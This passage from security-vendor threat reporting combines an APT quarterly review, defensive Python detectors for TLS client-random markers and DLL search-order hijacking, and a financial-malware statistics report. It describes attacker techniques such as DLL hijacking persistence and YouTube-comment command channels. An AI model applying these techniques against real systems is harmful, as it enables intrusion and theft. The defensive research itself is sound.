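    randoms_by_host = defaultdict(list)
    for src, record in flows:
        try:
            randoms_by_host[src].append(client_random(record))
        except ValueError:
            continue   # not a ClientHello; ignore
    marked = {}
    for src, randoms in randoms_by_host.items():
        if len(randoms) < min_handshakes:
            continue
        prefixes = {r[:prefix_len] for r in randoms}
        if len(prefixes) == 1:
            marked[src] = prefixes.pop().hex()
    return marked


def _fake_random(label):
    """Deterministic stand-in for PRNG output so the sample is reproducible."""
    return hashlib.sha256(label).digest()


# Constructed traffic: a clean host, a marked host, a host seen too rarely
# to judge, and one application-data record that is not a handshake at all.
SAMPLE_FLOWS = (
    [("198.51.100.5", build_client_hello(_fake_random(b"clean-%d" % i))) for i in range(3)]
    + [("198.51.100.7", build_client_hello(b"\xde\xad\xbe\xef" + _fake_random(b"marked-%d" % i)[:28]))
       for i in range(3)]
    + [("198.51.100.8", build_client_hello(b"\xca\xfe\xf0\x0d" + _fake_random(b"rare-%d" % i)[:28]))
       for i in range(2)]
    + [("198.51.100.9", b"\x17\x03\x03\x00\x05hello")]
)

if __name__ == "__main__":
    print(find_marked_hosts(SAMPLE_FLOWS))
```

The parser is deliberately strict: anything that is not a handshake record with a ClientHello inside is skipped rather than guessed at, which keeps resumed sessions and application data from polluting the per-host sample. The heuristic only says "this host's browser is not producing fresh randoms"; confirming that the constant bytes are an encrypted machine identifier still requires the implant itself, and in TLS 1.3 the random is sent in the clear just as in 1.2, so the same capture point works for both.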

Additionally we identified a new backdoor that we attribute with medium confidence to Turla. The backdoor, named Tunnus, is .NET-based malware with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the C2 infrastructure has been built using compromised sites with vulnerable WordPress installations. According to our telemetry, Tunnus’s activity started last March and was still active at the time of writing.

ESET has also reported PowerShell scripts being used by Turla to provide direct, in-memory loading and execution of malware. This is not the first time this threat actor has used PowerShell in this way, but the group has improved these scripts and is now using them to load a wide range of custom malware from its traditional arsenal. The payloads delivered via the PowerShell scripts – the RPC backdoor and PowerStallion – are highly customized.

Symantec has also been tracking targeted attacks in a series of campaigns against governments and international organizations across the globe over the past 18 months. The attacks have featured a rapidly evolving toolset and, in one notable instance, the apparent hijacking of infrastructure belonging to OilRig. They have uncovered evidence that the Waterbug APT group (aka Turla, Snake, Uroburos, Venomous Bear and KRYPTON) has conducted a hostile takeover of an attack platform belonging to OilRig (aka Crambus). Researchers at Symantec suspect that Turla used the hijacked network to attack a Middle Eastern government that OilRig had already penetrated. This is not the first time that we have seen this type of activity. Clearly, operations of this kind make the job of attribution more difficult.

The international community continues to focus on the activity of Russian-speaking threat actors. Over the last 18 months, the UK has shared information on attacks attributed to Russian hackers with 16 NATO allies, including attacks on critical national infrastructure and attempts to compromise central government networks. In his former capacity as UK foreign secretary, Jeremy Hunt recently urged nations to band together to create a deterrent for state-sponsored hackers. As part of this push, the UK and its intelligence partners have been slowly moving towards a 'name and shame' approach when dealing with cyberattacks. The use of the 'court of public opinion' in response to cyberattacks is a trend that we highlighted in our predictions for 2019. To support this new strategy, the EU recently passed new laws that make it possible for EU member states to impose economic sanctions on foreign hackers.

Researchers at the Microstep Intelligence Bureau have published a report on targeted attacks on the Ukrainian government that they attribute to the Gamaredon threat actor. Recently, the group launched attacks on a number of state organizations in Ukraine using Pterodo, malware used exclusively by this group. Since February, the attackers have deployed a large number of dynamic domain names and newly registered domain names believed to be used to launch targeted attacks against elections in Ukraine.

Chinese-speaking activity

We found an active campaign by a Chinese APT group we call SixLittleMonkeys that uses a new version of the Microcin Trojan and a RAT that we call HawkEye as the last stage. The campaign mainly targets government bodies in Central Asia. For persistence, the operators use DLL search order hijacking: they place a custom decryptor carrying the name of a system library (e.g., version.dll or api-ms-win-core-fibers-l1-1-1.dll) in the directory of a legitimate application that loads a library of that name, so the loader picks up the planted DLL from the application directory before the genuine one in the system directory. Among other legitimate applications, the threat actor uses the Google updater, GoogleCrashHandler.exe, for DLL hijacking. Custom encryptors protect the next stages from detection on disk and from automated analysis, using the same encryption keys in different samples. For TLS communication with its C2, the malware uses the Secure Channel (Schannel) Windows security package.
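A sweep for this persistence layout is cheap, because the tell is structural: a file named like a system DLL sitting in an application directory rather than in System32. The following is an added example, not SixLittleMonkeys tooling and not Kaspersky's detection logic. The DLL names are the two the text mentions; the directory tree is built with tempfile purely for the demonstration, and on a real host you would point scan() at the Program Files and per-user application directories and pass the actual System32 and SysWOW64 paths as trusted.

```python
import fnmatch
import os
import shutil
import tempfile

# DLL names the text reports being planted next to legitimate executables.
HIJACK_NAMES = ("version.dll", "api-ms-win-core-*.dll")


def is_hijack_name(filename):
    name = filename.lower()
    return any(fnmatch.fnmatch(name, pattern) for pattern in HIJACK_NAMES)


def scan(root, trusted_dirs):
    """Walk root and report system-DLL look-alikes outside the trusted dirs.

    A hit that sits in the same directory as an .exe is the classic
    search-order hijack layout: the loader checks the application directory
    before System32, so the planted DLL wins.
    """
    trusted = {os.path.normcase(os.path.abspath(d)) for d in trusted_dirs}
    findings = []
    for dirpath, _subdirs, files in os.walk(root):
        if os.path.normcase(os.path.abspath(dirpath)) in trusted:
            continue
        has_exe = any(f.lower().endswith(".exe") for f in files)
        for f in files:
            if is_hijack_name(f):
                findings.append({
                    "name": f.lower(),
                    "path": os.path.join(dirpath, f),
                    "next_to_exe": has_exe,
                })
    return findings


def build_sample_tree():
    """Constructed directory layout standing in for a Windows volume."""
    root = tempfile.mkdtemp(prefix="hijack-demo-")
    layout = {
        ("Windows", "System32"): ["version.dll", "kernel32.dll"],           # legitimate copy
        ("Google", "Update"): ["GoogleCrashHandler.exe", "version.dll"],    # hijack layout
        ("Vendor", "App"): ["app.exe", "api-ms-win-core-fibers-l1-1-1.dll", "helper.dll"],
        ("Users", "Downloads"): ["version.dll"],                            # stray copy, no exe
        ("Docs",): ["readme.txt"],
    }
    for parts, files in layout.items():
        directory = os.path.join(root, *parts)
        os.makedirs(directory)
        for f in files:
            with open(os.path.join(directory, f), "wb") as fh:
                fh.write(b"MZ")   # placeholder content, not a real PE
    return root


def run_demo():
    """Build the sample tree, scan it, clean up, return the findings."""
    root = build_sample_tree()
    try:
        return scan(root, [os.path.join(root, "Windows", "System32")])
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for hit in run_demo():
        flag = "NEXT TO EXE" if hit["next_to_exe"] else "stray"
        print(f"{flag}: {hit['path']}")
```

The sample yields three hits: the copies beside GoogleCrashHandler.exe and app.exe are the ones to triage first, while the stray copy in a download folder is lower priority. A name match is only a lead; the next step is to compare the file's hash and signer against the genuine library in System32, which a planted decryptor will fail.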

ESET discovered that the attackers behind the Plead malware have been distributing it using compromised routers and man-in-the-middle (MITM) attacks in April. Researchers have detected this activity in Taiwan, where the Plead malware has been most actively deployed. Trend Micro has previously reported the use of this malware in targeted attacks by the BlackTech group, primarily focused on cyber-espionage in Asia. ESET telemetry has revealed multiple attempts to deploy it.

LuckyMouse activity detected by Palo Alto involved the attackers installing web shells on SharePoint servers to compromise government organizations in the Middle East, probably exploiting CVE-2019-0604, a remote code execution vulnerability used to compromise the server and eventually install a web shell. The actors uploaded a variety of tools that they used to perform additional activities on the compromised network, such as dumping credentials, as well as locating and pivoting to additional systems on the network. Of particular note is the group’s use of tools to identify systems vulnerable to CVE-2017-0144, the vulnerability exploited by EternalBlue and used in the 2017 WannaCry attacks. This activity appears to be related to campaigns exploiting CVE-2019-0604 mentioned in recent security alerts from the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security.

Last year, a number of Chinese hackers allegedly linked to the Chinese government were indicted in the US. In May, the US Department of Justice indicted a Chinese national for a series of computer intrusions, including the 2015 data breach of health insurance company Anthem which affected more than 78 million people.

Middle East

The last three months have been very interesting for this region, especially considering the multiple leaks of alleged Iranian activity that were published within just a few weeks of each other. Even more interesting is the possibility that one of the leaks may have been part of a disinformation campaign carried out with the help of the Sofacy/Hades actor.

In March, someone going by the handle Dookhtegan or Lab_dookhtegan started posting messages on Twitter using the hashtag #apt34. Several files were shared via Telegram that supposedly belonged to the OilRig threat actor. They included logins and passwords of several alleged hacking victims, tools, infrastructure details potentially related to different intrusions, the résumés of the alleged attackers and a list of web shells – apparently relating to the period 2014-18.

The targeting and TTPs are consistent with this threat actor, but it was impossible to confirm the origins of the tools included in the dump. Assuming that the data in the dump is accurate, it also shows the global reach of the OilRig group, which has generally been thought to operate primarily in the Middle East.

On April 22, an entity going by the alias Bl4ck_B0X created a Telegram channel named GreenLeakers. The purpose of the channel, as stated by its creator, was to publish information about the members of the MuddyWater APT group, “along with information about their mother and spouse and etc.”, for free. In addition to this free information, the Bl4ck_B0X actor(s) also hinted that “highly confidential” information related to MuddyWater would be put up for sale.

On April 27, three screenshots were posted in the GreenLeakers Telegram channel, containing alleged screenshots from a MuddyWater C2 server. On May 1, the channel was closed to the public and its status changed to private. This was before Bl4ck_B0X had the chance to publish the promised information on the MuddyWater group. The reason for the closure is still unclear.

Finally, a website named Hidden Reality published leaks allegedly related to an entity named the Iranian RANA institute. It was the third leak in two months disclosing details of alleged Iranian threat actors and groups.

Interestingly, this leak differed from the others by employing a website that allows anyone to browse the leaked documents. It also relies on Telegram and Twitter profiles to post messages related to Iranian CNO capabilities. The Hidden Reality website contains internal documents, chat messages and other data related to the RANA institute’s CNO (Computer Network Operations) capabilities, as well as information about victims. Previous leaks were focused more on tools, source code and individual actor profiles.

Close analysis of the materials, the infrastructure and the dedicated website used by the leakers, provided clues that led us to believe Sofacy/Hades may be connected to these leaks.

There was also other MuddyWater activity unrelated to the leak, as well as discoveries linked to previous activity by the group, such as ClearSky's discovery of two domains hacked by MuddyWater at the end of 2018 to host the code of its POWERSTATS malware.

In April, Cisco Talos published its analysis of the BlackWater campaign, related to MuddyWater activity. The campaign shows how the attackers added three distinct steps to their operations, allowing them to bypass certain security controls to evade detection: an obfuscated VBA script to establish persistence as a registry key, a PowerShell stager and FruityC2 agent script, and an open source framework on GitHub to further enumerate the host machine. This could allow the attackers to monitor web logs and determine whether someone outside the campaign has made a request to their server in an attempt to investigate the activity. Once the enumeration commands run, the agent communicates with a different C2 and sends back data in the URL field. Trend Micro also reported MuddyWater’s use of a new multi-stage PowerShell-based backdoor called POWERSTATS v3.

We published a private report about four Android malware families and their use of false flag techniques, among other things. One of the campaigns sent spear-phishing emails to a university in Jordan and the Turkish government, using compromised legitimate accounts to trick victims into installing malware.

Regarding other groups, we discovered new activity related to ZooPark, a cyber-espionage threat actor that has focused mainly on stealing data from Android devices. Our new findings include new malicious samples and additional infrastructure that has been deployed since 2016. This also led to us discovering Windows malware implants deployed by the same threat actor. The additional indicators we found shed some light on the targets of past campaigns, including Iranian Kurds – mainly political dissidents and activists.

Recorded Future published an analysis of the infrastructure built by APT33 (aka Elfin) to target Saudi organizations. Following the exposure of a wide range of their infrastructure and operations by Symantec in March, researchers at Recorded Future discovered that APT33, or closely aligned actors, reacted by either parking or reassigning some of their domain infrastructure. The fact that this activity was executed just a day or so after the report went live suggests the Iranian threat actors are acutely aware of the media coverage of their activities and are resourceful enough to be able to react in a quick manner. Since then, the attackers have continued to use a large swath of operational infrastructure, well in excess of 1,200 domains, with many observed communicating with 19 different commodity RAT implants. An interesting development appears to be their increased preference for njRAT, with over half of the observed suspected APT33 infrastructure being linked to njRAT deployment.

On a more political level, there were several news stories covering Iranian activity.

A group connected to the Iranian Revolutionary Guard has been blamed for a wave of cyber-attacks against UK national infrastructure, including the Post Office, local government networks, private companies and banks. Personal data of thousands of employees were stolen. It is believed that the same group was also responsible for the attack on the UK parliamentary network in 2017. The UK NCSC (National Cyber Security Centre) is providing assistance to affected organizations.

Microsoft recently obtained a court order in the US to seize control of 99 websites used by the Iranian hacking group APT35 (aka Phosphorus and Charming Kitten). The threat actor used spoofed websites, including those of Microsoft and Yahoo, to conduct cyberattacks against businesses, government agencies, journalists and activists who focus on Iran. The sinkholing of these sites will force the group to recreate part of its infrastructure.

The US Cybersecurity and Infrastructure Security Agency (CISA) has reported an increase in cyberattacks by Iranian actors or proxies, targeting US industries and government agencies using destructive wiper tools. The statement was posted on Twitter by CISA director, Chris Krebs.

Southeast Asia and Korean Peninsula

This quarter we detected a lot of Korean-related activity. However, for the rest of the Southeast Asian region there has not been that much activity, especially when compared to earlier periods.

Early in Q2, we identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code. It’s clear that Lazarus keeps updating its tools very quickly. Meanwhile, BlueNoroff, the Lazarus sub-group that typically targets financial institutions, targeted a bank in Central Asia and a crypto-currency business in China.

In a recent campaign, we observed ScarCruft using a multi-stage binary to infect several victims and ultimately install a final payload known as ROKRAT – a cloud service-based backdoor. ScarCruft is a highly skilled APT group, historically using geo-political issues to target the Korean Peninsula. We found several victims worldwide identified as companies and individuals with ties to North Korea, as well as a diplomatic agency. Interestingly, we observed that ScarCruft continues to adopt publicly available exploit code in its tools. We also found an interesting overlap in a Russian-based victim targeted both by ScarCruft and DarkHotel – not the first time that we have seen such an overlap.

ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal. This backdoor shares its features with a previous Mac OS variant, but the structure has changed and detection is now much harder. Researchers were unable to find the dropper associated with this sample, so they could not identify the initial compromise vector.

The US Department of Homeland Security (DHS) has reported Trojan variants, identified as HOPLIGHT, being used by the North Korean government. The report includes an analysis of nine malicious executable files. Seven of them are proxy applications that mask traffic between the malware and the remote operators. The proxies have the ability to generate fake TLS handshake sessions using valid public SSL certificates, disguising network connections with remote malicious actors. One file contains a public SSL certificate and the payload of the file appears to be encoded with a password or key. The remaining file does not contain any of the public SSL certificates, but attempts outbound connections and drops four files: the dropped files primarily contain IP addresses and SSL certificates.

In June, we came across an unusual set of samples used to target diplomatic, government and military organizations in countries in South and Southeast Asia. The threat actor behind the campaign, which we believe to be the PLATINUM APT group, uses an elaborate, previously unseen, steganographic technique to conceal communication. A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and this campaign provides proof: the actors used two interesting steganography techniques in this APT. It’s also interesting that the attackers decided to implement the utilities they need as one huge set – an example of the framework-based architecture that is becoming more and more popular.

Other interesting discoveries

On May 14, Microsoft released fixes for a critical Remote Code Execution vulnerability (CVE-2019-0708) in Remote Desktop Services (formerly known as Terminal Services) that affects some older versions of Windows: Windows 7, Windows Server 2008 R2, Windows Server 2008 and some unsupported versions of Windows – including Windows 2003 and Windows XP. Details on how to mitigate this vulnerability are available in our private report ‘Analysis and detection guidance for CVE-2019-0708’. The Remote Desktop Protocol (RDP) itself is not vulnerable. This vulnerability is pre-authentication and requires no user interaction. In other words, the vulnerability is ‘wormable’, meaning that any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way that WannaCry spread. Microsoft has not observed exploitation of this vulnerability, but believes it is highly likely that malicious actors will write an exploit for it.

Early in June, researchers at Malwarebytes Labs observed a number of compromises on Amazon CloudFront, a Content Delivery Network (CDN), where hosted JavaScript libraries were tampered with and injected with web skimmers. Although attacks that involve CDNs usually affect a large number of web properties at once via their supply chain, this isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or link to code developed specifically for them and hosted on a custom AWS S3 bucket. Without properly validating externally loaded content, these sites are exposing their users to various threats, including some that pilfer credit card data. After analyzing these breaches, researchers found that they are a continuation of a campaign from Magecart threat actors attempting to cast a wide net around many different CDNs. CDNs are widely used because they provide great benefits to website owners, including optimizing load times and cost, as well as helping with all sorts of data analytics. The sites they identified had nothing in common other than the fact they were all using their own custom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN repository would be themselves.

Dragos has reported that XENOTIME, the APT group behind the TRISIS (aka TRITON and HatMan) attack on a Saudi Arabian petro-chemical facility in 2017, has expanded its focus beyond the oil and gas industries. Researchers have recently seen the group probing the networks of electric utility organizations in the US and elsewhere – perhaps as a precursor to a dangerous attack on critical infrastructure that could potentially cause physical damage or loss of life. Dragos first noticed the shift in targeting in late 2018; and the attacks have continued into 2019.

We recently reported on the latest versions of FinSpy for Android and iOS, developed in mid-2018. This surveillance software is sold to government and law enforcement organizations all over the world, who use it to collect a variety of private user information on various platforms. WikiLeaks first discovered the implants for desktop devices in 2011 and mobile implants were discovered in 2012. Since then Kaspersky has continuously monitored the development of this malware and the emergence of new versions in the wild. Mobile implants for iOS and Android have almost the same functionality. They are capable of collecting personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges on an unrooted device by abusing known vulnerabilities. It would seem that the iOS solution doesn’t provide infection exploits for its customers: the product seems to be fine-tuned to clean traces of publicly available jailbreaking tools. This might imply that physical access to the victim’s device is required in cases where devices are not already jailbroken. The latest version includes multiple features that we haven’t observed before. During our recent research, we detected up-to-date versions of these implants in the wild in almost 20 countries, but the size of the customer base would suggest that the real number of victims may be much higher.

Final thoughts

APT activity in the Middle East has been particularly interesting this quarter, not least because of the leaks related to alleged Iranian activity. This is especially interesting because one of those leaks might have been part of a disinformation campaign carried out with the help of the Sofacy/Hades threat actor.

In contrast to earlier periods, when Southeast Asia was the most active region for APTs, the activities we detected this quarter were mainly Korean-related. For the rest of the region, it was a much quieter quarter.

Across all regions, geo-politics remains the principal driver of APT activity.

It is also clear from our FinSpy research that there is a high demand for ‘commercial’ malware from governments and law enforcement agencies.

One of the most noteworthy aspects of the APT threat landscape we reported this quarter was our discovery of TajMahal, a previously unknown and technically sophisticated APT framework that has been in development for at least five years. This full-blown spying framework includes up to 80 malicious modules stored in its encrypted Virtual File System – one of the highest numbers of plugins we’ve ever seen for an APT toolset.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it needs to be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

Financial threats in H1 2019

31 July, 2019 - 17:00

Introduction and methodology

Financial cyberthreats are malicious programs that attack users of online banking services, electronic money, cryptocurrency and other similar services, as well as threats aimed at gaining access to financial organizations and their infrastructure. Kaspersky experts regularly analyze the statistics that the company’s products anonymously send to the cloud infrastructure of the Kaspersky Security Network (KSN) in cases where users agree to transfer such data. In order to study the threat landscape of the financial sector, the researchers analyzed cases of malicious activity on the devices of private users of Kaspersky’s security solutions. Statistics on corporate users were collected from corporate security solutions, after the customers agreed to share their data with Kaspersky. The information obtained was compared with data from the same period in 2018 to track trends in the development of malware. We looked at quarterly results for PC users, as we were able to divide that data into two categories – corporate and private users. Traditionally, the second and third quarters may differ from the first and fourth, as people often go on vacation and there is less corporate financial activity in these periods. The most active malware families were then analyzed.

Main findings:
  • In the first half of 2019, more than 430,000 unique users were attacked by financial threats – seven percent more than during the same period in 2018
  • The number of financial attacks in the first half of 2019 was 10,493,792 – 93% more than in the first and second quarter of 2018
  • The number of malware samples from financial threats received by Kaspersky in the first half of 2019 was 5,242,462 – 74% more than the previous year
  • The countries with the largest share of users attacked by financial malware were China and Belarus (2.3% each). In second and third place were Venezuela (2.2%) and South Korea (2.1%), respectively
  • During the first half of 2019, Kaspersky blocked more than 339,000 attempts to switch users to phishing pages pretending to be big banks
  • 438,709 unique users encountered mobile financial threats in the first half of 2019 – 23% less than in the same period in 2018
  • The number of mobile financial attacks in the first half of 2019 was 3,730,378 – 107% more than in the first half of 2018

Threats to PC: banking malware and phishing

In the first half of 2019, Kaspersky experts detected 431,088 unique users[1] attacked by banking Trojans aimed at stealing funds and financial data, which was a seven percent increase compared to the same period in 2018 (400,830).


The number of unique attacked users, Q1 2018 – Q2 2019


The number of unique attacked users by user type, Q1 2018-Q2 2019

At the same time, the share of users attacked through corporate devices in the first half of 2019 reached 30.9%, while in the first half of 2018, this figure was half as much (15.3%).

Researchers also noticed an increased number of malicious files in 2019. Thus, in the first quarter, the number of samples in the Kaspersky collection more than doubled, compared to the same period in 2018, reaching 335,000. But in the second quarter, growth slowed down.


Number of samples of new financial malware, Q1 2018 – Q2 2019

Attacks have also become more frequent: the number of attempts to infect a device detected by Kaspersky’s protective solutions in both the first and second quarter of 2019 exceeded the corresponding figures of 2018 by 51% and 27%, respectively.


The number of attempted financial malware infections, Q1 2018 – Q2 2019

For a more complete analysis of the threat landscape, experts compiled a list of the most active banking Trojans in the first and second quarters of 2019, ranking them by the number of unique users that these threats attacked. 39.50% of corporate users were attacked by the RTM Trojan, one of the most common malware samples of the past year. In second place was Emotet (14.90%), which is capable of loading further malware onto an infected device – for example, the Trickster Trojan, which itself occupies third place in our ranking (12.30%).

Corporate users                            Private users
Trojan-Banker.Win32.RTM          39.50%    Trojan-Banker.Win32.Zbot       25.50%
Trojan-Banker.Win32.Emotet       14.90%    Trojan-Banker.Win32.RTM        24.50%
Trojan-Banker.Win32.Trickster    12.30%    Trojan-Banker.Win32.Emotet      6.40%

Top 3 types of financial malware found in the first half of 2019

This is different for private users: the above-mentioned RTM and Emotet occupy second and third places with 24.5% and 6.4%, respectively, and in the first place is Zbot – one of the most common Trojans of 2018. Such malware is usually spread with the help of email campaigns or through phishing sites. In the first half of 2019, Kaspersky prevented more than 339,000 attempts to switch users to phishing pages that were designed as legitimate pages of large banks.

Geography

The top 10 countries with the largest share of users attacked by financial malware do not have geopolitical similarities and are not situated in a specific region. In the first place were China and Belarus (2.3%), followed by Venezuela (2.2%) and South Korea (2.1%).

Country*        %**
China           2.30
Belarus         2.30
Venezuela       2.20
South Korea     2.10
Serbia          1.80
Greece          1.70
Cameroon        1.60
Indonesia       1.50
Pakistan        1.50
Russia          1.40

* Countries where the number of users of Kaspersky’s security solutions is relatively small (less than 10,000) are excluded from the ranking.
** The share of unique users attacked in relation to all users of Kaspersky’s security solutions in the country.

Top 10 countries by the proportion of unique users attacked by financial malware

Threats to mobile platforms

In the first half of 2019, attackers actively used the names of the largest financial services and banking organizations to attack mobile platform users. Researchers found 438,709 unique users attacked by mobile Trojan bankers. For comparison, in the first half of 2018, the number of attacked users was 569,057, a decrease of 23%.


The number of users attacked by financial threats for mobile platforms, H1 2018 – H1 2019

Similar cases can be seen in the table representing the total number of attacks over this period.


The number of attacks of financial threats for mobile platforms, H1 2018 – H1 2019

The number of attacked users and detected attacks peaked sharply in the second half of 2018: 1,333,410 users were attacked and there were 10,256,935 attacks. The reason behind this is the rapid growth in activity of the Asacub banking Trojan and an increase in the distribution of the Svpeng banking Trojan. As can be seen from Kaspersky’s records for this period, the number of Asacub attacks peaked in the second half of 2018, multiplying almost a thousand times compared to the figures for H1 2018. However, the epidemic then subsided in H1 2019.

                                         H1 2018    H2 2018    H1 2019
Trojan-Banker.AndroidOS.Asacub.a             476     431036      69704
Trojan-Banker.AndroidOS.Asacub.snt           182     341726      92483
Trojan-Banker.AndroidOS.Asacub.ce              0     196479      34211
Trojan-Banker.AndroidOS.Asacub.ci              0     194564       3101
Trojan-Banker.AndroidOS.Asacub.cg              0     152011       2893
Trojan-Banker.AndroidOS.Svpeng.q           84268     126316      35400

The influence of Asacub on the overall statistics can be clearly seen in the graph below.


The number of users attacked by Asacub banking trojan, H1 2018 – H1 2019

The overall number of detected malicious files (installation packages) has decreased since the first half of 2018: in the first half of 2019, there were 43% fewer. At the same time, researchers recorded an increase in the number of attacks, rising by 107%.


Number of malicious files for mobile platforms, H1 2018 – H1 2019

The top-five malware families for mobile platforms in the first half of 2019 is almost identical to the overall rating for 2018.

More than half (51.39%) of users faced representatives of the Asacub malware, which recorded powerful growth last year. At the peak of its “popularity” this malicious software attacked up to 40,000 users per day. This was partly due to the Trojan’s distribution method: when it reached the victim’s phone, it sent messages to all of the victim’s contacts with links to download the installation file.

The Asacub family is followed by the Agent family (16.75%). This is the generic verdict for banking Trojans that cannot be classified into particular families or are represented by only one sample.

14.91% were attacked by the Svpeng Trojan. Like most banking Trojans, Svpeng slips a false login page to the user, and then intercepts the data entered in the login and password fields.

Family                                  %*
Trojan-Banker.AndroidOS.Asacub       51.39
Trojan-Banker.AndroidOS.Agent        16.75
Trojan-Banker.AndroidOS.Svpeng       14.91
Trojan-Banker.AndroidOS.Faketoken     7.56
Trojan-Banker.AndroidOS.Hqwar         2.56

* The share of users attacked by a certain family of malicious programs from all users attacked by financial threats

TOP 5 financial malware families, H1 2019

The Anubis Trojan is particularly interesting: it intercepts credentials for the services of large financial organizations and two-factor authentication data (codes from SMS), and it can also encrypt the device’s data in order to extort money. It is one of the few banking Trojans that spreads via instant messaging apps, such as WhatsApp, sending a link to the victim’s contact list. Anubis is known to be one of the first threats in which comments on the YouTube platform were used as a command centre – a platform from which attackers manage malware. This usually works in the following way: malware writers create a video on YouTube and write a description or comment containing a command. The malware then connects to this video page, reads the description or comment and executes the command.

This works because YouTube is a public resource: when one analyzes an infected user’s traffic and sees a YouTube link in the list of accessed pages, even a cybersecurity expert may not consider it suspicious. They could even be unaware that those requests were not sent by the user but by malware. Moreover, such communication cannot easily be blocked without blocking the user’s access to the entire YouTube website.

Conclusion and recommendations

In the first half of 2019, researchers recorded an increase in the number of users attacked by financial malware for personal computers compared to the same period in 2018, and a decrease in the activity of cybercriminals targeting mobile platforms.

The main families of malware that attacked users in 2019 remained the same: for mobile platforms, the leaders turned out to be the Asacub family, and for PC RTM (for corporate users) and Zbot (for private users) trojans were the most prolific.

It was not possible to single out specific geographic locations where financial threats are most active, since they turned out to be approximately equal for users in all regions.

To protect against financial threats, Kaspersky recommends that users:
  • Install applications only from trusted sources – such as official stores;
  • Check what access rights and permissions the application requests – if they do not correspond to what the program is designed to do then it should be questioned;
  • Do not follow links in spam messages and do not open documents attached to them;
  • Use a reliable security solution, including on mobile devices.

To protect your business from financial malware, Kaspersky security specialists advise:
  • Introducing cybersecurity awareness training for your employees, particularly those who are responsible for accounting, to teach them how to distinguish phishing attacks: do not open attachments or click on links from unknown or suspicious addresses
  • Installing the latest updates and patches for all of the software you use
  • Forbidding the installation of programs from unknown sources
  • For endpoint-level detection, investigation and timely remediation of incidents, implementing an EDR solution such as Kaspersky Endpoint Detection and Response, which can even catch unknown banking malware
  • Integrating Threat Intelligence into your SIEM and security controls in order to access the most relevant and up-to-date threat data